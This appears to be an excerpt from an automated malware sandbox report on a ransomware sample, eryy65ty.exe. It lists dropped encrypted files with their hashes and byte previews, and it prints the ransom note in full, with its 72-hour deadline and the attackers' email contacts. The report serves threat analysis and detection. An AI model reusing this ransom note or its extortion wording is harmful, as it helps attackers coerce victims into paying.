                                                                                                                                            Preview:...'`...#K.zo..*...w......;^....!...B>n2.j..V...D......o<].q.).BmM.Y....my..(4.y....z.1.....W4.B...gc..".k.....XQ...x\......'...V`...PY.....b[4c.D:.._..J..]..S..qU..i...U1.<.j.=.M4.C=g...h..:....%sT.7....W..`g..q.j..t......".}u...X.*F{.QF!....Pu.1..nG..u..^F+.T.....-....#..^3...j.5 ...dt.......>o.cO.]3....J.^..q.....5.&...L..+.Q$....^u...j......w._G...j.Z.%f..S.C....j.-d.R.!r).g.".s...6bh..y...y....S.r.{.&...8.....=yzqh....t......S.....(.1.....a.......Y..MQ..o.=...n...d.......cT...}....~.....8A.O.f$...T+).8..\.B.....m...&K,..|1.Na.Ci.....::..F..\.[..wB.w.......x.".$>.{......}.s3....z_...G\..).l}.e............4.N...\QX..T.M/...".q.....s.|.V.....D9.>.. ..w*... Q.r}DZ@..a.%......&:;..;....5:6....MB.s.a>Q8....IH...r...R...Uo .th.%...".RS..K.........Qoa.&e.M..F.9.l....Qw......c.....].m...*..g:_..'.7k....,.lZ'../5....q.T.yBo...*.&..E....L E.g.]..T...f.!.:..*.....*b+.E.(.y....k.H&u.r.....7.RZs.5.}..3.......Dc?.#?F-_...mA7....B.sIa.......X..m
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864840898591916
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BoLInt02YrTWz6jRmR3FxopF1dO1xU+ugA0UIAkkvY:BoMner3A3FxopFLOg+ufzvY
                                                                                                                                            MD5:20E9FD478968A7692C39AF147D74F521
                                                                                                                                            SHA1:AD6F5B01BF549E5AD63C1E9F41A0E0CF8766E643
                                                                                                                                            SHA-256:8D5982388374226501EE443C3F6A75637669C84B867E3B9B6FEDAE8BF7F5D9F6
                                                                                                                                            SHA-512:ACBD8685DC7DE70AD86CCB5D17012BC52080879DF78C9A38C793E0C03E62224DCC8FAD4D81329477F269AB813AFC474FCE5CB4868C7BF7BF367C9088838C0420
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..w.|...TWU.l.&6.r..c....w84Aw.,j..y.8..,.;..'"(.ZA.K4S.../....}.......1.....Et.a:....{..T.<...Q.0...E.....<.)...+B.=..^.eq...-D.j.....BR..n.....[.. E6..{5...W....1..bP.T?.G.=P.'..X...Nr........ ....z....6..3...R<.....7^.k.v.aR....k..A..F.-........:ejA..X.$.y.S"lr..V.h)z..4..oj..zG...."...ZP...z..s..T.w.y..u...yV/.JU.A43N.oV....`..T..~...~b...;7.....>e>H..F..K....}TKQ.+.. .6L..~.....7>:8..#.....+...@C.d.;.......V"F.......~?..8.STP'..^.....+.......T..l.K.HN..0...Q.|ty. .J".FI.>.u..w[uEvA.....R.h...G..t.7.R...$-..D..!)_.t.g40..i..5Qy.\.jU`...U........Yf...?.9lME.6}.2...M..j|..J.......].>....{T..:0.b9..V..{...Gv......s..*..|a=,.v.PH.kh..0...8>..&S%..j...99'.......CP.)M...<......mH.1..W.....a/..!}...M!..gB.0h........tg.2...~..n.JSR...P.0kj.@6I..7.~...4%a.e2M.&...@H.b....?.......iO...X..j.2...M..*...7...@...3.*....^!.........7.nB....'....Vf0.Y....n.`....v..u2...B...4.H......v....EZ.........v..q...6.L.I..D...P.D..c9.....o....@.".|.z.[..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.864840898591916
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BoLInt02YrTWz6jRmR3FxopF1dO1xU+ugA0UIAkkvY:BoMner3A3FxopFLOg+ufzvY
                                                                                                                                            MD5:20E9FD478968A7692C39AF147D74F521
                                                                                                                                            SHA1:AD6F5B01BF549E5AD63C1E9F41A0E0CF8766E643
                                                                                                                                            SHA-256:8D5982388374226501EE443C3F6A75637669C84B867E3B9B6FEDAE8BF7F5D9F6
                                                                                                                                            SHA-512:ACBD8685DC7DE70AD86CCB5D17012BC52080879DF78C9A38C793E0C03E62224DCC8FAD4D81329477F269AB813AFC474FCE5CB4868C7BF7BF367C9088838C0420
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..w.|...TWU.l.&6.r..c....w84Aw.,j..y.8..,.;..'"(.ZA.K4S.../....}.......1.....Et.a:....{..T.<...Q.0...E.....<.)...+B.=..^.eq...-D.j.....BR..n.....[.. E6..{5...W....1..bP.T?.G.=P.'..X...Nr........ ....z....6..3...R<.....7^.k.v.aR....k..A..F.-........:ejA..X.$.y.S"lr..V.h)z..4..oj..zG...."...ZP...z..s..T.w.y..u...yV/.JU.A43N.oV....`..T..~...~b...;7.....>e>H..F..K....}TKQ.+.. .6L..~.....7>:8..#.....+...@C.d.;.......V"F.......~?..8.STP'..^.....+.......T..l.K.HN..0...Q.|ty. .J".FI.>.u..w[uEvA.....R.h...G..t.7.R...$-..D..!)_.t.g40..i..5Qy.\.jU`...U........Yf...?.9lME.6}.2...M..j|..J.......].>....{T..:0.b9..V..{...Gv......s..*..|a=,.v.PH.kh..0...8>..&S%..j...99'.......CP.)M...<......mH.1..W.....a/..!}...M!..gB.0h........tg.2...~..n.JSR...P.0kj.@6I..7.~...4%a.e2M.&...@H.b....?.......iO...X..j.2...M..*...7...@...3.*....^!.........7.nB....'....Vf0.Y....n.`....v..u2...B...4.H......v....EZ.........v..q...6.L.I..D...P.D..c9.....o....@.".|.z.[..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.862259916710468
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:VAemekT6/Tz2U8ncsa1wckbnZo46PB8XhkPH:Vlmte2lcsa1w1o4O8Xh+
                                                                                                                                            MD5:B6F332071F29AB4CF537F9D276CCCAD4
                                                                                                                                            SHA1:F7733811512CB8D3221E62FF126DEA3400D09522
                                                                                                                                            SHA-256:E8FF4A796948BC2D908A1FA197D7A514BF474F18EE4457911EB9CF28C434B6DF
                                                                                                                                            SHA-512:F9B575360E59733F5CB2CB650A9974A92C63C4A093AA7B39BE8C87E47EF10D3C92B2AB533203F3FAF2604E8D29BF9868A10D54DCEA7913AC5B03F7494EAA63EA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.HW.H.....WB"...j..!.F)qf.7S6...y..W_J.}.).'.^...L.?).`>!a:P9.Ba.U...A@)...k@...3.8..v..'.L..s..0.M.j... ./..e1.C..i8T3..t-.*!.z...q.'..>....u.oT...#...R..D.6....`....W.. I...+5s..0.....B$.@k.6..s.Om...+.x........w.......V...D.9iSMzg.....E.n.s.Y.Ns..u...*.n..G..^..Hf.......moE.J..`.t...M.&1.-_xW.e:Rzk-....F......f2..=....+.x./....).s..g4.?i"...7z.&....0_........7_..^z....Y.(D.G>B....XO...^L......+..|.\...."c2.g.M.......{..7..X...f..Z...g......_.q.m..Zt..j.%xP.5n..Z.....c~fW]f..5...R.!Q.......t../.zR...6..c..:.0 @bY..J..~...c..v.u..3R.F.8...a..9Y....^7.5....w.G.2.*..^FP..Y.....x1...y=8..l...a.U^.V....U..O...8X..............3...#...+.</4...ZvE...&.......}.=....v;.KJG/~l]~.gn8x.1.?n....x.U).8^*.._.!...d,...9..~..z.j.SL43....,.o..R......m.vW(6k...y.m.|.h8.'....M.z........q.]..k).W.....siU..[g.h...ev...L3.d...2.|..4I...}{....^4pC=.\..4. n.X..W........B.[,K:..r..j........I5..r..F.].-i.2..l>..~|K..g3..;d..0.."M.C.....p...TEc.f.i....8C.~.`../..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.862259916710468
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:VAemekT6/Tz2U8ncsa1wckbnZo46PB8XhkPH:Vlmte2lcsa1w1o4O8Xh+
                                                                                                                                            MD5:B6F332071F29AB4CF537F9D276CCCAD4
                                                                                                                                            SHA1:F7733811512CB8D3221E62FF126DEA3400D09522
                                                                                                                                            SHA-256:E8FF4A796948BC2D908A1FA197D7A514BF474F18EE4457911EB9CF28C434B6DF
                                                                                                                                            SHA-512:F9B575360E59733F5CB2CB650A9974A92C63C4A093AA7B39BE8C87E47EF10D3C92B2AB533203F3FAF2604E8D29BF9868A10D54DCEA7913AC5B03F7494EAA63EA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.HW.H.....WB"...j..!.F)qf.7S6...y..W_J.}.).'.^...L.?).`>!a:P9.Ba.U...A@)...k@...3.8..v..'.L..s..0.M.j... ./..e1.C..i8T3..t-.*!.z...q.'..>....u.oT...#...R..D.6....`....W.. I...+5s..0.....B$.@k.6..s.Om...+.x........w.......V...D.9iSMzg.....E.n.s.Y.Ns..u...*.n..G..^..Hf.......moE.J..`.t...M.&1.-_xW.e:Rzk-....F......f2..=....+.x./....).s..g4.?i"...7z.&....0_........7_..^z....Y.(D.G>B....XO...^L......+..|.\...."c2.g.M.......{..7..X...f..Z...g......_.q.m..Zt..j.%xP.5n..Z.....c~fW]f..5...R.!Q.......t../.zR...6..c..:.0 @bY..J..~...c..v.u..3R.F.8...a..9Y....^7.5....w.G.2.*..^FP..Y.....x1...y=8..l...a.U^.V....U..O...8X..............3...#...+.</4...ZvE...&.......}.=....v;.KJG/~l]~.gn8x.1.?n....x.U).8^*.._.!...d,...9..~..z.j.SL43....,.o..R......m.vW(6k...y.m.|.h8.'....M.z........q.]..k).W.....siU..[g.h...ev...L3.d...2.|..4I...}{....^4pC=.\..4. n.X..W........B.[,K:..r..j........I5..r..F.].-i.2..l>..~|K..g3..;d..0.."M.C.....p...TEc.f.i....8C.~.`../..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.84162371994871
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DdVGoIolwgD1CTRDTI9Sx/YKygew4wd5/39C4Z1R3z/qa:D3GoJslI9Sx/5nzx39/R/b
                                                                                                                                            MD5:C0E2F9581C3802EF2A0AFF3EC5A804A9
                                                                                                                                            SHA1:14CDF1DB4F4403A4279B62C05A6E49E528754D0B
                                                                                                                                            SHA-256:45F5D00470F5745739D155E1C5EB1921D2C194B6971086B5A5EE24A885C728FD
                                                                                                                                            SHA-512:497B83117A8F990333D879FBD6C9D6A9E47C6045653D4AFA28197CD2C2F990F3514E76A813449F7E522326778D1AD8534B6D364BB3BA9BEEDBEFC7BD1D96B39D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.c..r4...1.L..dC...Mz6.g.V....L..'..G.....a$u..b1.ih.....n.".....*~1o.G.n..........2.T..j).a.D..!.w..<...A....;....4..../.!Bt....A...L.b5..A=..p...^......I..M...Z...`!m.}...={..ppf......#a.`......H..o.:..y..o.............x..+Aj..rB...j`..+..|...@.-..=..,...?<.&../......P.IN...zu"P.*.....\l.^..U...l8.b.....D.K........c1m..."...2.,..w..W......`.e..i)":....R.0...(.Nk..\....uLr..r..y..'/..g.PV.....&...Nj.R...% ..A^..J.K..oH9.A f..tR>...O.aq.L.y.......?&o.<.ha..F..f&...4...C..c..j..*.9..5...Z......b..`?%..V~.........r.j..E\.........=.../a.....dr$.# ..........-.+..& .A..wT.....N.:T.V....F.r..d,8D.+#`P../...*......z.Xdb..._"..".?.........G....{-.?_..q..........U`ohb..LrmG..3;&OO.$..{$UF..^.....F...jJ....vF..w.d..d..Z. .2.. W..,.L.t(...:`.RS.......*....E....=....V......F.)8.I....R....a.q)...oA.#..@`.T...S~{.+....]...@,.....%....b.....G;.O.w........;-b..}.Ls\X.5hG...6..G.c..?I.W}-.\.....7...nE.....&S}.{."i.V.H.U.m.Z.-.. .....Sd.<8.J3.!..-...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.84162371994871
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:DdVGoIolwgD1CTRDTI9Sx/YKygew4wd5/39C4Z1R3z/qa:D3GoJslI9Sx/5nzx39/R/b
                                                                                                                                            MD5:C0E2F9581C3802EF2A0AFF3EC5A804A9
                                                                                                                                            SHA1:14CDF1DB4F4403A4279B62C05A6E49E528754D0B
                                                                                                                                            SHA-256:45F5D00470F5745739D155E1C5EB1921D2C194B6971086B5A5EE24A885C728FD
                                                                                                                                            SHA-512:497B83117A8F990333D879FBD6C9D6A9E47C6045653D4AFA28197CD2C2F990F3514E76A813449F7E522326778D1AD8534B6D364BB3BA9BEEDBEFC7BD1D96B39D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.c..r4...1.L..dC...Mz6.g.V....L..'..G.....a$u..b1.ih.....n.".....*~1o.G.n..........2.T..j).a.D..!.w..<...A....;....4..../.!Bt....A...L.b5..A=..p...^......I..M...Z...`!m.}...={..ppf......#a.`......H..o.:..y..o.............x..+Aj..rB...j`..+..|...@.-..=..,...?<.&../......P.IN...zu"P.*.....\l.^..U...l8.b.....D.K........c1m..."...2.,..w..W......`.e..i)":....R.0...(.Nk..\....uLr..r..y..'/..g.PV.....&...Nj.R...% ..A^..J.K..oH9.A f..tR>...O.aq.L.y.......?&o.<.ha..F..f&...4...C..c..j..*.9..5...Z......b..`?%..V~.........r.j..E\.........=.../a.....dr$.# ..........-.+..& .A..wT.....N.:T.V....F.r..d,8D.+#`P../...*......z.Xdb..._"..".?.........G....{-.?_..q..........U`ohb..LrmG..3;&OO.$..{$UF..^.....F...jJ....vF..w.d..d..Z. .2.. W..,.L.t(...:`.RS.......*....E....=....V......F.)8.I....R....a.q)...oA.#..@`.T...S~{.+....]...@,.....%....b.....G;.O.w........;-b..}.Ls\X.5hG...6..G.c..?I.W}-.\.....7...nE.....&S}.{."i.V.H.U.m.Z.-.. .....Sd.<8.J3.!..-...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.845126191316767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:HtkBpoDnEccDM4BjReblWdjkZzXkInokP1nCu3Wi9E9B3y1nMy77Vk:HtkBaxcDV7eBnR07kpWiOyuy7G
                                                                                                                                            MD5:80BF41F5E541245B0D1277E855B7451D
                                                                                                                                            SHA1:7A58896CA81F9DF6AF3AA7F33D692A394C99C13A
                                                                                                                                            SHA-256:41047719CC8A2CFA304AECB4DB6B5EF946A094C709BF1AB34BD70B204C9FFB10
                                                                                                                                            SHA-512:BA84708DB3CE970BB05EC380C7091C59EC5D93288FF8834868FA70475D0421F2DEC7079C51A86A56C360660DA1599EAF7C608D0156CFA6476C71D43EC9718FB5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.'.|..O..0J..^x.G.P.o-F....9].}..I.t.w..?.U.e.[.......+..T.....M..#..8..%..+..d9..........f..!...U..?h2H.O{.gw....]...'_..%....rPa4{.o....(. ..<.Z...x]...b.h.{S.h.8.j~Q..1.~..4......c..h..%.Sl.........m^..^e..>.q..=....'C......#47..K.-P^...q.M....tBn.{...:...AaC...e........(...,6[.t.]S..|...uK=.|S.~[...F..u&[.=.8.i,..R.g25.K...........O.....).8#.Bh..s..&..z....k7...1..is.....Pc..5...t]ze->3.......'.z?.#.Kd|...Rl_..2R@v....f.5.....c....^?>C=.... ..C.8A..'`>.AfA ....\x....6...L..y.j.W.".....".)R...6...9.S.x.2...>....t....-{..|U...0..f..!.h..[.].V6HO...f..}mg.......l......1......p.n\.f./7.....Y\..PB.........Q.l=8.y..9F"a}U....`ZJ....7.!._.......+$-...4.D5.$....~..N...X.cc..=y.X....G.....4.e..Z...9..hbT..w....T.%.gq#rK]f..X...'E(lD......O..9.K.D}y0...f......XQ/..i..v7-Z....v."..]{.m....D...w...9.Gc....9..9....}...N(,m.....`YJ....@4L..?....p"..8...[..CL.D.W..1mlv/..>....e.....'Gw...C.. 8..v.........*..Y.....ve..@r4<.k..@(
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.845126191316767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:HtkBpoDnEccDM4BjReblWdjkZzXkInokP1nCu3Wi9E9B3y1nMy77Vk:HtkBaxcDV7eBnR07kpWiOyuy7G
                                                                                                                                            MD5:80BF41F5E541245B0D1277E855B7451D
                                                                                                                                            SHA1:7A58896CA81F9DF6AF3AA7F33D692A394C99C13A
                                                                                                                                            SHA-256:41047719CC8A2CFA304AECB4DB6B5EF946A094C709BF1AB34BD70B204C9FFB10
                                                                                                                                            SHA-512:BA84708DB3CE970BB05EC380C7091C59EC5D93288FF8834868FA70475D0421F2DEC7079C51A86A56C360660DA1599EAF7C608D0156CFA6476C71D43EC9718FB5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.'.|..O..0J..^x.G.P.o-F....9].}..I.t.w..?.U.e.[.......+..T.....M..#..8..%..+..d9..........f..!...U..?h2H.O{.gw....]...'_..%....rPa4{.o....(. ..<.Z...x]...b.h.{S.h.8.j~Q..1.~..4......c..h..%.Sl.........m^..^e..>.q..=....'C......#47..K.-P^...q.M....tBn.{...:...AaC...e........(...,6[.t.]S..|...uK=.|S.~[...F..u&[.=.8.i,..R.g25.K...........O.....).8#.Bh..s..&..z....k7...1..is.....Pc..5...t]ze->3.......'.z?.#.Kd|...Rl_..2R@v....f.5.....c....^?>C=.... ..C.8A..'`>.AfA ....\x....6...L..y.j.W.".....".)R...6...9.S.x.2...>....t....-{..|U...0..f..!.h..[.].V6HO...f..}mg.......l......1......p.n\.f./7.....Y\..PB.........Q.l=8.y..9F"a}U....`ZJ....7.!._.......+$-...4.D5.$....~..N...X.cc..=y.X....G.....4.e..Z...9..hbT..w....T.%.gq#rK]f..X...'E(lD......O..9.K.D}y0...f......XQ/..i..v7-Z....v."..]{.m....D...w...9.Gc....9..9....}...N(,m.....`YJ....@4L..?....p"..8...[..CL.D.W..1mlv/..>....e.....'Gw...C.. 8..v.........*..Y.....ve..@r4<.k..@(
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.863144046908273
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:a6ndDynLqciw87UaZvVPqfMtFpTAIZU9JBvkSB/1yOEdXLu7d:ZFH1w8ga1gfCFpT2d3Asp
                                                                                                                                            MD5:A3ED6D9AEE7E7B35E39BC403A29B23B1
                                                                                                                                            SHA1:B86FB32CCABCBE827B3982FD9D0136232AF7782E
                                                                                                                                            SHA-256:54E4DD8770A9108EACCE513BDC5AA9D30D76E459A4E5F441DE09CFAB71E7E790
                                                                                                                                            SHA-512:F60266EBC4B19D21D8071C6EB6C5F35E969A0232846B5AE3F39A1E41A6795BA5BA06140F442FDFC04AA4220F1466C763B9E024B218666F6A0B560294C30B0BA5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:B.4...f,U...F..e...{.W......}......6......f..N..}......}.8.....z...}]!.C.iHO..._.......S.p......N.57]m..8/.C....1..|Z...~..P.. .pJ./..`.`.t.b...w....on...s......]...._i+.+l.#......_.....M.gg."4.2.Wls.....e:&ql.V\...qj...>. .....o.. %...YA.F........%...m9.r..o...........7.....ID....6I.1l..9&..3.C..f..(.;...?..G..f..X..%...\...o..x...}........f..zJ...VEO..vK.l\sk\.zEX!..+....nV>U............8I...<...e.X./.mqH).Q...B....d.{..4.f..j...,w.L....R1..`O>)Y.[.m...=..~....WE.ce_.C)..c...JgA..b.....O[.7Jm.}.....g..........?'.1..\..FD;......J..ex9.KO..jmR..;.kb.)...p.X..{...........M..K..4'GF.....g.Od.......}..........Y..RY&.i/&...ciQ."Z..I.J.^a.O..2X....b.[W!.=....$.&]p ..$."/0U.....Swm.~c'......LvbX.t`.5zh[..n>.JH..'...........g2..n..,....K.G.......a~....UW.....t..s.|.P..m.u...f.e.....X....0..p".h..*..l.<..W;.d...&...E...U.e.....[..i...."W.4@G...f......a..ou..=fRq... ..e.F.h.....K.....dZP..F=/.*$..]...9.....i..6........H.e<...V7...g..`
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.863144046908273
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:a6ndDynLqciw87UaZvVPqfMtFpTAIZU9JBvkSB/1yOEdXLu7d:ZFH1w8ga1gfCFpT2d3Asp
                                                                                                                                            MD5:A3ED6D9AEE7E7B35E39BC403A29B23B1
                                                                                                                                            SHA1:B86FB32CCABCBE827B3982FD9D0136232AF7782E
                                                                                                                                            SHA-256:54E4DD8770A9108EACCE513BDC5AA9D30D76E459A4E5F441DE09CFAB71E7E790
                                                                                                                                            SHA-512:F60266EBC4B19D21D8071C6EB6C5F35E969A0232846B5AE3F39A1E41A6795BA5BA06140F442FDFC04AA4220F1466C763B9E024B218666F6A0B560294C30B0BA5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:B.4...f,U...F..e...{.W......}......6......f..N..}......}.8.....z...}]!.C.iHO..._.......S.p......N.57]m..8/.C....1..|Z...~..P.. .pJ./..`.`.t.b...w....on...s......]...._i+.+l.#......_.....M.gg."4.2.Wls.....e:&ql.V\...qj...>. .....o.. %...YA.F........%...m9.r..o...........7.....ID....6I.1l..9&..3.C..f..(.;...?..G..f..X..%...\...o..x...}........f..zJ...VEO..vK.l\sk\.zEX!..+....nV>U............8I...<...e.X./.mqH).Q...B....d.{..4.f..j...,w.L....R1..`O>)Y.[.m...=..~....WE.ce_.C)..c...JgA..b.....O[.7Jm.}.....g..........?'.1..\..FD;......J..ex9.KO..jmR..;.kb.)...p.X..{...........M..K..4'GF.....g.Od.......}..........Y..RY&.i/&...ciQ."Z..I.J.^a.O..2X....b.[W!.=....$.&]p ..$."/0U.....Swm.~c'......LvbX.t`.5zh[..n>.JH..'...........g2..n..,....K.G.......a~....UW.....t..s.|.P..m.u...f.e.....X....0..p".h..*..l.<..W;.d...&...E...U.e.....[..i...."W.4@G...f......a..ou..=fRq... ..e.F.h.....K.....dZP..F=/.*$..]...9.....i..6........H.e<...V7...g..`
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855834862306278
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:JvWaIPwKpreSRa1yxIcD+NWJWA/XRO7btnHRBxkNLUkmTtf9xFcaMU:JWaIPwuiWxIcD+NQjXRsRx5vXcaMU
                                                                                                                                            MD5:B44F2DBA5D83C672A983CC5B178DC5FE
                                                                                                                                            SHA1:9CA7607F382E4FE09AE0A7628E7D25A1A099F1FA
                                                                                                                                            SHA-256:7C19296D2DDD09ED2D8E4C949F24CE9319451413A13829F826C7B240A1BD88EF
                                                                                                                                            SHA-512:EA45E3C462FD353304FB25A11A8624B280E3E35A5DD85F98316729D0775A3846C4D2F4D71461602FCC61F2238F95410FA8FAAF2405F9BBF5DFCACDC79979AFE8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:O../.&...........zZ...!.Cr.p2.jnx...?. ....qY.M.*.S.n4&6..9..;.K 5..AR......R.....R.l*..-7..S;.3|..b.W.r.P..2.:$.G.. ...D..{b..5.s)^V@5]...@<....:...<.......TJ.V..#.".S.....^s......SE..p...Q....t~|..F.C._.H...).a.0.w:..L..u.H..0.s^..A.w.xGe...c.C.F..7.....L.%.....i..t....#K#-{[.w.(...a..@pW.7e..O.kS..QJ.]..B....y.'..r.~;q.G..2..$.sX.HK.....n.h.{.e.....$'".B.....o.....IFJ...l..yAc..e.-.......N'....0....U.c7....o...'....U.a....`....J......@[.p..<"..J+.N.aQW../..~R..32|?.w^..K..}.....V...7..%.=9W,..P.2V..d..m....\v...j.7{...Z1....g...rL.U.ml...x....!".x.sC1..d.P|7..U..........p.t.m.`....v...D..Pt....35.H,...;`'.8?I..02...|sf9....k..U.&.9.y.3a..r.F....W.....D...M...9-.=..."..j.>...[...L...[.......mI...K..z......27zuA..S..7P...yr.(H.>......L..IZWg:.1......V".X.y..O.....@"....r..KM<.gK..(.#.)........UY...X.VV.......zN...Ii...c,.kr...r$..Q^`..>..d....E....U...=.D .a.3..H...B!.........7./...>..Y.o..\.=..N..C.....$.|.AnG..?...R...|.G}].u|5....[..h...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.855834862306278
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:JvWaIPwKpreSRa1yxIcD+NWJWA/XRO7btnHRBxkNLUkmTtf9xFcaMU:JWaIPwuiWxIcD+NQjXRsRx5vXcaMU
                                                                                                                                            MD5:B44F2DBA5D83C672A983CC5B178DC5FE
                                                                                                                                            SHA1:9CA7607F382E4FE09AE0A7628E7D25A1A099F1FA
                                                                                                                                            SHA-256:7C19296D2DDD09ED2D8E4C949F24CE9319451413A13829F826C7B240A1BD88EF
                                                                                                                                            SHA-512:EA45E3C462FD353304FB25A11A8624B280E3E35A5DD85F98316729D0775A3846C4D2F4D71461602FCC61F2238F95410FA8FAAF2405F9BBF5DFCACDC79979AFE8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:O../.&...........zZ...!.Cr.p2.jnx...?. ....qY.M.*.S.n4&6..9..;.K 5..AR......R.....R.l*..-7..S;.3|..b.W.r.P..2.:$.G.. ...D..{b..5.s)^V@5]...@<....:...<.......TJ.V..#.".S.....^s......SE..p...Q....t~|..F.C._.H...).a.0.w:..L..u.H..0.s^..A.w.xGe...c.C.F..7.....L.%.....i..t....#K#-{[.w.(...a..@pW.7e..O.kS..QJ.]..B....y.'..r.~;q.G..2..$.sX.HK.....n.h.{.e.....$'".B.....o.....IFJ...l..yAc..e.-.......N'....0....U.c7....o...'....U.a....`....J......@[.p..<"..J+.N.aQW../..~R..32|?.w^..K..}.....V...7..%.=9W,..P.2V..d..m....\v...j.7{...Z1....g...rL.U.ml...x....!".x.sC1..d.P|7..U..........p.t.m.`....v...D..Pt....35.H,...;`'.8?I..02...|sf9....k..U.&.9.y.3a..r.F....W.....D...M...9-.=..."..j.>...[...L...[.......mI...K..z......27zuA..S..7P...yr.(H.>......L..IZWg:.1......V".X.y..O.....@"....r..KM<.gK..(.#.)........UY...X.VV.......zN...Ii...c,.kr...r$..Q^`..>..d....E....U...=.D .a.3..H...B!.........7./...>..Y.o..\.=..N..C.....$.|.AnG..?...R...|.G}].u|5....[..h...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
